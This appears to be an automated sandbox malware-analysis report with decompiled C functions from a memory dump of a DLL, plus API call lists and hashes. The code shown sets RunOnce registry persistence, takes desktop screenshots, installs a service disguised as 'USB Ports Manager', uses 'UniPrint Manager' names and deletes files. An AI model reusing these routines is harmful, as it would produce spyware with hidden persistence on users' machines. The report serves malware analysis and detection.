                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.754490413.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.754474115.000000006F330000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754512937.000000006F33D000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754530015.000000006F340000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754546355.000000006F341000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: PrivateProfile$String$Heap$Write$Process$AllocFreeMemoryMove
                                                                                                                        • String ID: g$h$n$n$p$s$t
                                                                                                                        • API String ID: 1023576463-1140765434
                                                                                                                        • Opcode ID: 0cde5862f183b121c62cf92efa75a81c7e92221fb73e9a1897498a688dcb8c77
                                                                                                                        • Instruction ID: bec72dedb32c6849fc37aabeba5ee61e32b396e40ad84842c132cdbd07fd08d7
                                                                                                                        • Opcode Fuzzy Hash: 0cde5862f183b121c62cf92efa75a81c7e92221fb73e9a1897498a688dcb8c77
                                                                                                                        • Instruction Fuzzy Hash: 468192B2618782AFD700DB68C844E5BB7EDABAA714F04890CF59497380D675E91CCB72
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E6F334CA0(void* __eflags, intOrPtr _a12) {
                                                                                                                        				int _v252;
                                                                                                                        				char _v256;
                                                                                                                        				int _v260;
                                                                                                                        				int _v264;
                                                                                                                        				void* _v276;
                                                                                                                        				void* _v284;
                                                                                                                        				char _v288;
                                                                                                                        				intOrPtr _t25;
                                                                                                                        				void* _t26;
                                                                                                                        				long _t31;
                                                                                                                        				int _t34;
                                                                                                                        				long _t36;
                                                                                                                        				char* _t37;
                                                                                                                        				char* _t45;
                                                                                                                        				int _t49;
                                                                                                                        				int _t56;
                                                                                                                        				char* _t59;
                                                                                                                        				char* _t60;
                                                                                                                        				char* _t71;
                                                                                                                        				CHAR* _t73;
                                                                                                                        				void* _t74;
                                                                                                                        				CHAR* _t76;
                                                                                                                        
                                                                                                                        				_t25 = M6F340588; // 0x7488d8
                                                                                                                        				_t26 = E6F33A2F0(_t25, 0, 0);
                                                                                                                        				_t74 = _t26;
                                                                                                                        				if(_t74 != 0) {
                                                                                                                        					_v288 = 0x4f6e7552;
                                                                                                                        					_v284 = 0x65636e;
                                                                                                                        					wsprintfA( &_v264, "%s\\%s", _t74,  &_v288);
                                                                                                                        					HeapFree(GetProcessHeap(), 0, _t74);
                                                                                                                        					_v284 = 0;
                                                                                                                        					_t31 = RegCreateKeyExA(0x80000001,  &_v256, 0, 0, 0, 0xf023f, 0,  &_v284, 0); // executed
                                                                                                                        					if(_t31 != 0) {
                                                                                                                        						L14:
                                                                                                                        						return _t31;
                                                                                                                        					}
                                                                                                                        					if(_a12 == 0) {
                                                                                                                        						_v264 = 0;
                                                                                                                        						_t73 = HeapAlloc(GetProcessHeap(), 8, 0x105);
                                                                                                                        						if(_t73 == 0) {
                                                                                                                        							L13:
                                                                                                                        							_t31 = RegCloseKey(_v284);
                                                                                                                        							goto L14;
                                                                                                                        						}
                                                                                                                        						_t59 = M6F340530; // 0xa32c28
                                                                                                                        						_t34 = wsprintfA(_t73, "\"%s\" f", _t59);
                                                                                                                        						_t60 = M6F34053C; // 0xa32c55
                                                                                                                        						_v252 = _t34;
                                                                                                                        						_v264 = 0;
                                                                                                                        						_v260 = 1;
                                                                                                                        						_t36 = RegQueryValueExA(_v276, _t60, 0,  &_v260, 0,  &_v264); // executed
                                                                                                                        						if(_t36 != 0) {
                                                                                                                        							L11:
                                                                                                                        							_t37 = M6F34053C; // 0xa32c55
                                                                                                                        							RegSetValueExA(_v276, _t37, 0, 1, _t73, _v252 + 1); // executed
                                                                                                                        							L12:
                                                                                                                        							HeapFree(GetProcessHeap(), 0, _t73);
                                                                                                                        							goto L13;
                                                                                                                        						}
                                                                                                                        						_t76 = HeapAlloc(GetProcessHeap(), 8, _v264 + 1);
                                                                                                                        						if(_t76 == 0) {
                                                                                                                        							goto L11;
                                                                                                                        						}
                                                                                                                        						_t45 = M6F34053C; // 0xa32c55
                                                                                                                        						if(RegQueryValueExA(_v276, _t45, 0,  &_v260, _t76,  &_v264) != 0) {
                                                                                                                        							L9:
                                                                                                                        							_t56 = _v256;
                                                                                                                        							L10:
                                                                                                                        							HeapFree(GetProcessHeap(), 0, _t76);
                                                                                                                        							if(_t56 != 0) {
                                                                                                                        								goto L12;
                                                                                                                        							}
                                                                                                                        							goto L11;
                                                                                                                        						}
                                                                                                                        						_t49 = lstrcmpiA(_t76, _t73);
                                                                                                                        						_t56 = 1;
                                                                                                                        						if(_t49 == 0) {
                                                                                                                        							goto L10;
                                                                                                                        						}
                                                                                                                        						goto L9;
                                                                                                                        					}
                                                                                                                        					_t71 = M6F34053C; // 0xa32c55
                                                                                                                        					RegDeleteValueA(_v284, _t71);
                                                                                                                        					goto L13;
                                                                                                                        				}
                                                                                                                        				return _t26;
                                                                                                                        			}


























                                                                                                                        APIs
                                                                                                                          • Part of subcall function 6F33A2F0: WideCharToMultiByte.KERNEL32(0000009C,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,00000000,?,00000000,6F336F16,00A56660,00000001,0000009C), ref: 6F33A311
                                                                                                                          • Part of subcall function 6F33A2F0: GetProcessHeap.KERNEL32(00000008,00000001,?,00000000,?,00000000,6F336F16,00A56660,00000001,0000009C,00000000,00000034,?,?,?,6F3403A0), ref: 6F33A323
                                                                                                                          • Part of subcall function 6F33A2F0: HeapAlloc.KERNEL32(00000000,?,00000000,?,00000000,6F336F16,00A56660,00000001,0000009C,00000000,00000034,?,?,?,6F3403A0,0000009C), ref: 6F33A32A
                                                                                                                          • Part of subcall function 6F33A2F0: WideCharToMultiByte.KERNEL32(0000009C,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,00000000,?,00000000,6F336F16,00A56660,00000001,0000009C), ref: 6F33A33E
                                                                                                                        • wsprintfA.USER32 ref: 6F334CEC
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,00000000,?), ref: 6F334CF9
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 6F334CFC
                                                                                                                        • RegCreateKeyExA.KERNEL32(80000001,?,00000000,00000000,00000000,000F023F,00000000,?,00000000), ref: 6F334D1F
                                                                                                                        • RegDeleteValueA.ADVAPI32(?,00A32C55), ref: 6F334D42
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000105), ref: 6F334D58
                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 6F334D61
                                                                                                                        • wsprintfA.USER32 ref: 6F334D7A
                                                                                                                        • RegQueryValueExA.KERNEL32 ref: 6F334DB3
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,?), ref: 6F334DC1
                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 6F334DC4
                                                                                                                        • RegQueryValueExA.ADVAPI32(00A32C55,00A32C55,00000000,?,00000000,?), ref: 6F334DE4
                                                                                                                        • lstrcmpiA.KERNEL32(00000000,00000000), ref: 6F334DEC
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 6F334E02
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 6F334E05
                                                                                                                        • RegSetValueExA.KERNEL32(00000000,00A32C55,00000000,00000001,00000000,?), ref: 6F334E25
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 6F334E2E
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 6F334E31
                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 6F334E3C
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.754490413.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: Heap$Process$Value$AllocFree$ByteCharMultiQueryWidewsprintf$CloseCreateDeletelstrcmpi
                                                                                                                        • String ID: "%s" f$%s\%s$RunO$nce
                                                                                                                        • API String ID: 5215680-3682672340
                                                                                                                        • Opcode ID: 4ee67e902b87192e15e7a7d3d7ff65f5d598896b9118ae86d8434ea793be3f45
                                                                                                                        • Instruction ID: 3f126947d0bee041aa488b919a6a471a3df25b4e8b0900cda6c68f3e89514c92
                                                                                                                        • Opcode Fuzzy Hash: 4ee67e902b87192e15e7a7d3d7ff65f5d598896b9118ae86d8434ea793be3f45
                                                                                                                        • Instruction Fuzzy Hash: 7D418DB2604745ABD720DB65DC88E6B7BBDFBCAB14F00450CF95497240EA72E815CB62
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • __invoke_watson.LIBCMT ref: 005555D3
                                                                                                                        • __invoke_watson.LIBCMT ref: 005555EE
                                                                                                                        • CreateFileA.KERNEL32(00000080,?,00000080,0000000C,00000001,00000080,00000000,00000109,00000000,00000000), ref: 005557D7
                                                                                                                        • CreateFileA.KERNEL32(00000080,7FFFFFFF,00000001,0000000C,00000001,00000080,00000000), ref: 00555810
                                                                                                                        • GetLastError.KERNEL32 ref: 00555835
                                                                                                                        • __dosmaperr.LIBCMT ref: 0055583C
                                                                                                                        • GetFileType.KERNEL32(00000000), ref: 00555851
                                                                                                                        • GetLastError.KERNEL32 ref: 00555876
                                                                                                                        • __dosmaperr.LIBCMT ref: 0055587F
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00555888
                                                                                                                        • __chsize_nolock.LIBCMT ref: 0055596C
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00555AEB
                                                                                                                        • CreateFileA.KERNEL32(00000080,?,00000001,0000000C,00000003,00000080,00000000), ref: 00555B08
                                                                                                                        • GetLastError.KERNEL32 ref: 00555B17
                                                                                                                        • __dosmaperr.LIBCMT ref: 00555B1E
                                                                                                                        • __lseeki64_nolock.LIBCMT ref: 00555B51
                                                                                                                        • __lseeki64_nolock.LIBCMT ref: 00555B66
                                                                                                                        • __lseeki64_nolock.LIBCMT ref: 00555BD5
                                                                                                                        • __lseeki64_nolock.LIBCMT ref: 00555BE6
                                                                                                                        • __locking.LIBCMT ref: 00555C95
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: File__lseeki64_nolock$CreateErrorLast__dosmaperr$CloseHandle__invoke_watson$Type__chsize_nolock__locking
                                                                                                                        • String ID: @$H
                                                                                                                        • API String ID: 2633173609-104103126
                                                                                                                        • Opcode ID: 2c27b8cb70341abea63fcc677adf9feb52aeac845cc550d636e48cd5cfacba99
                                                                                                                        • Instruction ID: 9652718ff90b0db00d63801c5aa4fbaf9ffc5e1e948bc0f52c8ea69fe1652fba
                                                                                                                        • Opcode Fuzzy Hash: 2c27b8cb70341abea63fcc677adf9feb52aeac845cc550d636e48cd5cfacba99
                                                                                                                        • Instruction Fuzzy Hash: 6222F371800A4ADBDF218FA8CCB57AD7FB1FF41326F24062AE951972A1E7358D48CB51
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 59%
                                                                                                                        			E6F3366E0() {
                                                                                                                        				intOrPtr* _v140;
                                                                                                                        				void** _v144;
                                                                                                                        				struct tagRECT _v164;
                                                                                                                        				long _v168;
                                                                                                                        				struct HDC__* _v172;
                                                                                                                        				int _v180;
                                                                                                                        				int _v184;
                                                                                                                        				void _v188;
                                                                                                                        				int _v192;
                                                                                                                        				int _v196;
                                                                                                                        				struct tagCURSORINFO _v212;
                                                                                                                        				struct HDC__* _v216;
                                                                                                                        				intOrPtr _v224;
                                                                                                                        				intOrPtr _v228;
                                                                                                                        				struct HICON__* _v232;
                                                                                                                        				intOrPtr _v252;
                                                                                                                        				intOrPtr _v256;
                                                                                                                        				void* _v264;
                                                                                                                        				intOrPtr _v268;
                                                                                                                        				intOrPtr _v272;
                                                                                                                        				struct HDC__* _v288;
                                                                                                                        				struct HDC__* _v304;
                                                                                                                        				long _v308;
                                                                                                                        				intOrPtr _v316;
                                                                                                                        				struct HDC__* _v320;
                                                                                                                        				intOrPtr _v324;
                                                                                                                        				struct HDC__* _t61;
                                                                                                                        				struct HDC__* _t62;
                                                                                                                        				int _t67;
                                                                                                                        				void* _t70;
                                                                                                                        				int _t75;
                                                                                                                        				void* _t82;
                                                                                                                        				intOrPtr _t91;
                                                                                                                        				int _t99;
                                                                                                                        				long _t101;
                                                                                                                        				int _t103;
                                                                                                                        				struct HWND__* _t136;
                                                                                                                        				void* _t137;
                                                                                                                        				int _t138;
                                                                                                                        				struct HDC__* _t139;
                                                                                                                        				intOrPtr _t140;
                                                                                                                        				int _t142;
                                                                                                                        				void* _t144;
                                                                                                                        
                                                                                                                        				_v168 = 0;
                                                                                                                        				_t136 = GetDesktopWindow();
                                                                                                                        				_v164.left = _t136;
                                                                                                                        				_t61 = GetDC(_t136);
                                                                                                                        				_t139 = _t61;
                                                                                                                        				_v172 = _t139;
                                                                                                                        				if(_t139 != 0) {
                                                                                                                        					_t62 = CreateCompatibleDC(_t139);
                                                                                                                        					_v188 = _t62;
                                                                                                                        					if(_t62 != 0) {
                                                                                                                        						_push(0x10);
                                                                                                                        						_push( &(_v164.right));
                                                                                                                        						L6F33C2EE();
                                                                                                                        						GetWindowRect(_t136,  &_v164);
                                                                                                                        						_t103 = _v164.bottom;
                                                                                                                        						_t67 = _v164.right;
                                                                                                                        						_t99 = _t67;
                                                                                                                        						_t142 = _t103;
                                                                                                                        						_t137 = CreateCompatibleBitmap(_t139, _t67, _t103);
                                                                                                                        						_v212.hCursor = _t137;
                                                                                                                        						if(_t137 != 0) {
                                                                                                                        							_t70 = SelectObject(_v212.flags, _t137);
                                                                                                                        							if(_t70 != 0 && _t70 != 0xffffffff && BitBlt(_v216, _v184, _v180, _t99, _t142, _t139, 0, 0, 0x40cc0020) != 0) {
                                                                                                                        								_push(0x14);
                                                                                                                        								_push( &(_v212.hCursor));
                                                                                                                        								L6F33C2EE();
                                                                                                                        								_v212.cbSize = 0x14;
                                                                                                                        								_t75 = GetCursorInfo( &_v212);
                                                                                                                        								if(_t75 != 0 && _v212.flags == 1) {
                                                                                                                        									_push(0x14);
                                                                                                                        									_push( &_v192);
                                                                                                                        									L6F33C2EE();
                                                                                                                        									_t75 = GetIconInfo(_v212.cbSize,  &(_v212.ptScreenPos));
                                                                                                                        									if(_t75 != 0) {
                                                                                                                        										_push(0x18);
                                                                                                                        										_push( &_v180);
                                                                                                                        										L6F33C2EE();
                                                                                                                        										GetObjectA(_v192, 0x18,  &_v188);
                                                                                                                        										_t75 = DrawIconEx(_v288, _v228 - _v256 + _v256 - _v216, _v224 - _v252 + _v252 - _v212, _v232, _v196, _v192, 0, 0, 3);
                                                                                                                        									}
                                                                                                                        								}
                                                                                                                        								__imp__#12(0, 0);
                                                                                                                        								_t138 = _t75;
                                                                                                                        								if(_t138 != 0) {
                                                                                                                        									_push(_t138);
                                                                                                                        									_push(_t142);
                                                                                                                        									_push(_t99);
                                                                                                                        									_push( &_v264);
                                                                                                                        									if(E6F336480() != 0) {
                                                                                                                        										_push(0x48);
                                                                                                                        										_push( &(_v164.right));
                                                                                                                        										L6F33C2EE();
                                                                                                                        										_push(1);
                                                                                                                        										_push( &_v164);
                                                                                                                        										_push(_t138);
                                                                                                                        										if( *((intOrPtr*)( *((intOrPtr*)( *_t138 + 0x30))))() >= 0) {
                                                                                                                        											_t101 = _v168;
                                                                                                                        											if(_t101 != 0) {
                                                                                                                        												_t82 = VirtualAlloc(0, _t101, 0x1000, 4); // executed
                                                                                                                        												_t144 = _t82;
                                                                                                                        												if(_t144 != 0) {
                                                                                                                        													_push(8);
                                                                                                                        													_push( &_v264);
                                                                                                                        													L6F33C2EE();
                                                                                                                        													_push(0);
                                                                                                                        													asm("xorpd xmm0, xmm0");
                                                                                                                        													asm("movlpd [esp+0x2c], xmm0");
                                                                                                                        													_push(0);
                                                                                                                        													_push(_v268);
                                                                                                                        													_push(_v272);
                                                                                                                        													_push(_t138);
                                                                                                                        													if( *((intOrPtr*)( *((intOrPtr*)( *_t138 + 0x14))))() < 0) {
                                                                                                                        														L24:
                                                                                                                        														VirtualFree(_t144, 0, 0x8000);
                                                                                                                        													} else {
                                                                                                                        														_t140 = 0;
                                                                                                                        														if(_t101 == 0) {
                                                                                                                        															L23:
                                                                                                                        															_t139 = _v304;
                                                                                                                        															goto L24;
                                                                                                                        														} else {
                                                                                                                        															while(1) {
                                                                                                                        																_push( &_v308);
                                                                                                                        																_push(_t101 - _t140);
                                                                                                                        																_push(_t140 + _t144);
                                                                                                                        																_push(_t138);
                                                                                                                        																_v308 = 0;
                                                                                                                        																if( *((intOrPtr*)( *((intOrPtr*)( *_t138 + 0xc))))() < 0) {
                                                                                                                        																	break;
                                                                                                                        																}
                                                                                                                        																_t91 = _v324;
                                                                                                                        																if(_t91 != 0) {
                                                                                                                        																	_t140 = _t140 + _t91;
                                                                                                                        																	if(_t140 < _t101) {
                                                                                                                        																		continue;
                                                                                                                        																	}
                                                                                                                        																}
                                                                                                                        																break;
                                                                                                                        															}
                                                                                                                        															if(_t140 == 0) {
                                                                                                                        																goto L23;
                                                                                                                        															} else {
                                                                                                                        																 *_v140 = _t140;
                                                                                                                        																_t139 = _v320;
                                                                                                                        																 *_v144 = _t144;
                                                                                                                        																_v316 = 1;
                                                                                                                        															}
                                                                                                                        														}
                                                                                                                        													}
                                                                                                                        												}
                                                                                                                        											}
                                                                                                                        										}
                                                                                                                        									}
                                                                                                                        									 *((intOrPtr*)( *((intOrPtr*)( *_t138 + 8))))(_t138); // executed
                                                                                                                        								}
                                                                                                                        								_t137 = _v264;
                                                                                                                        							}
                                                                                                                        							DeleteObject(_t137);
                                                                                                                        						}
                                                                                                                        						DeleteDC(_v212.flags);
                                                                                                                        						_t136 = _v192;
                                                                                                                        					}
                                                                                                                        					ReleaseDC(_t136, _t139);
                                                                                                                        					return _v172;
                                                                                                                        				} else {
                                                                                                                        					return _t61;
                                                                                                                        				}
                                                                                                                        			}

                                                                                                                        APIs
                                                                                                                        • GetDesktopWindow.USER32 ref: 6F3366F0
                                                                                                                        • GetDC.USER32(00000000), ref: 6F3366FD
                                                                                                                        • CreateCompatibleDC.GDI32(00000000), ref: 6F336717
                                                                                                                        • RtlZeroMemory.NTDLL(?,00000010), ref: 6F336732
                                                                                                                        • GetWindowRect.USER32 ref: 6F33673D
                                                                                                                        • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 6F336752
                                                                                                                        • SelectObject.GDI32(?,00000000), ref: 6F33676C
                                                                                                                        • BitBlt.GDI32(?,?,?,?,?,00000000,00000000,00000000,40CC0020), ref: 6F33679E
                                                                                                                        • RtlZeroMemory.NTDLL(?,00000014), ref: 6F3367B3
                                                                                                                        • GetCursorInfo.USER32(?,?,?,?,?,?,?,?,?,?,00000014), ref: 6F3367C5
                                                                                                                        • RtlZeroMemory.NTDLL(?,00000014), ref: 6F3367E5
                                                                                                                        • GetIconInfo.USER32(?,?), ref: 6F3367F4
                                                                                                                        • RtlZeroMemory.NTDLL(?,00000018), ref: 6F336805
                                                                                                                        • GetObjectA.GDI32(?,00000018,?), ref: 6F336816
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.754490413.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.754474115.000000006F330000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754512937.000000006F33D000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754530015.000000006F340000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754546355.000000006F341000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: MemoryZero$CompatibleCreateInfoObjectWindow$BitmapCursorDesktopIconRectSelect
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3821519111-0
                                                                                                                        • Opcode ID: f2972d9751e82e47922c31759095ead73aaa2a843e33c28de46479fdfd7f13d2
                                                                                                                        • Instruction ID: 5edd4008e85c71a6e05d28f4fc7243db9f12e416d3f7eefce464569818c76a71
                                                                                                                        • Opcode Fuzzy Hash: f2972d9751e82e47922c31759095ead73aaa2a843e33c28de46479fdfd7f13d2
                                                                                                                        • Instruction Fuzzy Hash: CE818A72604395AFD720DF64C884F6BB7E9AB8AB54F00490DFA8497284DB71E805CB62
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 57%
                                                                                                                        			E6F337F10(void* __ebp, struct HINSTANCE__* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, struct HWND__* _a20) {
                                                                                                                        				void* _t7;
                                                                                                                        				struct HWND__* _t8;
                                                                                                                        				struct HWND__* _t11;
                                                                                                                        				void* _t16;
                                                                                                                        				struct HWND__* _t26;
                                                                                                                        				intOrPtr _t29;
                                                                                                                        				intOrPtr _t31;
                                                                                                                        				void* _t33;
                                                                                                                        				void* _t35;
                                                                                                                        				struct HINSTANCE__* _t40;
                                                                                                                        				struct HWND__* _t41;
                                                                                                                        				void* _t45;
                                                                                                                        				void* _t46;
                                                                                                                        				void* _t47;
                                                                                                                        
                                                                                                                        				_t45 = __ebp;
                                                                                                                        				_t29 = _a8;
                                                                                                                        				if(_t29 == 0x275b || _t29 == 0x2755 || _t29 == 0x2ae1) {
                                                                                                                        					__eflags = 0;
                                                                                                                        					return 0;
                                                                                                                        				} else {
                                                                                                                        					_t40 = _a4;
                                                                                                                        					_t7 = E6F334E50(_t40, _t29);
                                                                                                                        					_t47 = _t46 + 8;
                                                                                                                        					_t35 = _t7;
                                                                                                                        					_t8 = _a20;
                                                                                                                        					_push(_t8);
                                                                                                                        					_push(_a16);
                                                                                                                        					_push(_a12);
                                                                                                                        					if(_t35 == 0) {
                                                                                                                        						_push(_t29);
                                                                                                                        						_push(_t40);
                                                                                                                        						M6F3405E8();
                                                                                                                        						_t41 = _t8;
                                                                                                                        					} else {
                                                                                                                        						_t26 = CreateDialogIndirectParamW(_t40, _t35, ??, ??, ??); // executed
                                                                                                                        						_t41 = _t26;
                                                                                                                        						HeapFree(GetProcessHeap(), 0, _t35);
                                                                                                                        					}
                                                                                                                        					if(_t41 == 0) {
                                                                                                                        						L17:
                                                                                                                        						return _t41;
                                                                                                                        					} else {
                                                                                                                        						SetWindowTextA(_t41, 0x6f33d664); // executed
                                                                                                                        						if(_t29 != 0x2872) {
                                                                                                                        							__eflags = _t29 - 0x2768;
                                                                                                                        							if(_t29 != 0x2768) {
                                                                                                                        								goto L17;
                                                                                                                        							} else {
                                                                                                                        								_t11 = GetDlgItem(_t41, 0x4e7d);
                                                                                                                        								_push(0);
                                                                                                                        								_push(0);
                                                                                                                        								__eflags = _t11;
                                                                                                                        								if(_t11 == 0) {
                                                                                                                        									PostMessageA(_t41, 0x10, ??, ??);
                                                                                                                        									goto L17;
                                                                                                                        								} else {
                                                                                                                        									PostMessageA(_t11, 0xf5, ??, ??);
                                                                                                                        									return _t41;
                                                                                                                        								}
                                                                                                                        							}
                                                                                                                        						} else {
                                                                                                                        							_t56 = M6F3404B4;
                                                                                                                        							if(M6F3404B4 != 0) {
                                                                                                                        								E6F3352B0(_t45, 1);
                                                                                                                        								_t47 = _t47 + 4;
                                                                                                                        								ExitProcess(0);
                                                                                                                        							}
                                                                                                                        							_push(0);
                                                                                                                        							E6F3328B0(".pdll");
                                                                                                                        							_t16 = M6F340534; // 0xa563b0
                                                                                                                        							_t31 = M6F340544; // 0x1
                                                                                                                        							_push(0);
                                                                                                                        							_push(L"Printer manager");
                                                                                                                        							M6F340540 = E6F334C30(_t31, _t16, L"UniPrint Manager");
                                                                                                                        							M6F34050C = E6F333C60();
                                                                                                                        							E6F334CA0(_t56, 0);
                                                                                                                        							if(M6F3404AC != 0) {
                                                                                                                        								_t33 = M6F340534; // 0xa563b0
                                                                                                                        								_push(0xffffffff);
                                                                                                                        								E6F333610(_t33);
                                                                                                                        								ExitProcess(0);
                                                                                                                        							}
                                                                                                                        							 *0x6f340398 = _t41;
                                                                                                                        							CallWindowProcW(E6F337790, _t41, 0x83fc, GetWindowLongW(_t41, 0xfffffffc), 0); // executed
                                                                                                                        							SetWindowLongW(_t41, 0xfffffffc, E6F337790);
                                                                                                                        							return _t41;
                                                                                                                        						}
                                                                                                                        					}
                                                                                                                        				}
                                                                                                                        			}


















                                                                                                                        APIs
                                                                                                                          • Part of subcall function 6F334E50: FindResourceW.KERNEL32(?,?,00000005), ref: 6F334E61
                                                                                                                          • Part of subcall function 6F334E50: LoadResource.KERNEL32(?,00000000), ref: 6F334E70
                                                                                                                          • Part of subcall function 6F334E50: SizeofResource.KERNEL32(?,00000000), ref: 6F334E7E
                                                                                                                          • Part of subcall function 6F334E50: LockResource.KERNEL32(00000000), ref: 6F334E87
                                                                                                                          • Part of subcall function 6F334E50: GetProcessHeap.KERNEL32(00000008,00000000), ref: 6F334E96
                                                                                                                          • Part of subcall function 6F334E50: HeapAlloc.KERNEL32(00000000), ref: 6F334E9D
                                                                                                                          • Part of subcall function 6F334E50: RtlMoveMemory.NTDLL(00000000,00000000,00000000), ref: 6F334EA8
                                                                                                                          • Part of subcall function 6F334E50: FreeResource.KERNEL32(00000000), ref: 6F334ED7
                                                                                                                        • CreateDialogIndirectParamW.USER32 ref: 6F337F60
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 6F337F6B
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 6F337F72
                                                                                                                          • Part of subcall function 6F3328B0: RtlZeroMemory.NTDLL(00000140,00000140), ref: 6F3328C2
                                                                                                                          • Part of subcall function 6F3328B0: RtlZeroMemory.NTDLL(?,00000208), ref: 6F3328D4
                                                                                                                          • Part of subcall function 6F3328B0: wsprintfA.USER32 ref: 6F3328F3
                                                                                                                          • Part of subcall function 6F3328B0: wsprintfA.USER32 ref: 6F332911
                                                                                                                          • Part of subcall function 6F3328B0: FindFirstFileA.KERNEL32(?,?), ref: 6F332923
                                                                                                                          • Part of subcall function 6F3328B0: lstrcmpA.KERNEL32(?,6F33D538,00000000,?), ref: 6F332950
                                                                                                                          • Part of subcall function 6F3328B0: lstrcmpA.KERNEL32(?,6F33D534), ref: 6F332960
                                                                                                                          • Part of subcall function 6F3328B0: lstrcatA.KERNEL32(?,?), ref: 6F332973
                                                                                                                          • Part of subcall function 6F3328B0: DeleteFileA.KERNEL32(?), ref: 6F33298C
                                                                                                                          • Part of subcall function 6F3328B0: FindNextFileA.KERNEL32(00000000,?), ref: 6F3329AD
                                                                                                                          • Part of subcall function 6F3328B0: FindClose.KERNEL32(00000000), ref: 6F3329B8
                                                                                                                          • Part of subcall function 6F333C60: OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F), ref: 6F333C7E
                                                                                                                          • Part of subcall function 6F333C60: OpenSCManagerA.ADVAPI32(00000000,00000000,00000001), ref: 6F333C8C
                                                                                                                          • Part of subcall function 6F333C60: OpenServiceA.ADVAPI32(00000000,USBManager,000F01FF), ref: 6F333CAA
                                                                                                                          • Part of subcall function 6F333C60: wsprintfA.USER32 ref: 6F333CEF
                                                                                                                          • Part of subcall function 6F333C60: CreateServiceA.ADVAPI32(?,USBManager,USB Ports Manager,000F01FF,00000020,00000002,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 6F333D1E
                                                                                                                          • Part of subcall function 6F333C60: ChangeServiceConfig2A.ADVAPI32 ref: 6F333D74
                                                                                                                          • Part of subcall function 6F333C60: wsprintfA.USER32 ref: 6F333D95
                                                                                                                          • Part of subcall function 6F334CA0: wsprintfA.USER32 ref: 6F334CEC
                                                                                                                          • Part of subcall function 6F334CA0: GetProcessHeap.KERNEL32(00000000,00000000,00000000,?), ref: 6F334CF9
                                                                                                                          • Part of subcall function 6F334CA0: HeapFree.KERNEL32(00000000), ref: 6F334CFC
                                                                                                                          • Part of subcall function 6F334CA0: RegCreateKeyExA.KERNEL32(80000001,?,00000000,00000000,00000000,000F023F,00000000,?,00000000), ref: 6F334D1F
                                                                                                                          • Part of subcall function 6F334CA0: RegDeleteValueA.ADVAPI32(?,00A32C55), ref: 6F334D42
                                                                                                                          • Part of subcall function 6F334CA0: RegCloseKey.ADVAPI32(?), ref: 6F334E3C
                                                                                                                        • SetWindowTextA.USER32(00000000,6F33D664), ref: 6F337F92
                                                                                                                        • ExitProcess.KERNEL32 ref: 6F337FB9
                                                                                                                        • ExitProcess.KERNEL32 ref: 6F33801E
                                                                                                                        • GetWindowLongW.USER32(00000000,000000FC), ref: 6F33802F
                                                                                                                        • CallWindowProcW.USER32(Function_00007790,00000000,000083FC,00000000), ref: 6F338041
                                                                                                                        • SetWindowLongW.USER32 ref: 6F33804F
                                                                                                                          • Part of subcall function 6F333610: CreateEnvironmentBlock.USERENV ref: 6F333641
                                                                                                                          • Part of subcall function 6F333610: RtlZeroMemory.NTDLL(?,00000044), ref: 6F33365B
                                                                                                                          • Part of subcall function 6F333610: RtlZeroMemory.NTDLL ref: 6F333677
                                                                                                                          • Part of subcall function 6F333610: CreateProcessAsUserW.ADVAPI32(00000000,00000000,?,00000000,00000000,00000000,00000020,?,00000000,?,00000020,?,?,?,00000010,?), ref: 6F3336A6
                                                                                                                          • Part of subcall function 6F333610: Sleep.KERNEL32(000001F4,?,?,?,00000010,?,00000044,00000000), ref: 6F3336B1
                                                                                                                          • Part of subcall function 6F333610: DestroyEnvironmentBlock.USERENV(?,?,00000010,?,00000044,00000000), ref: 6F3336E4
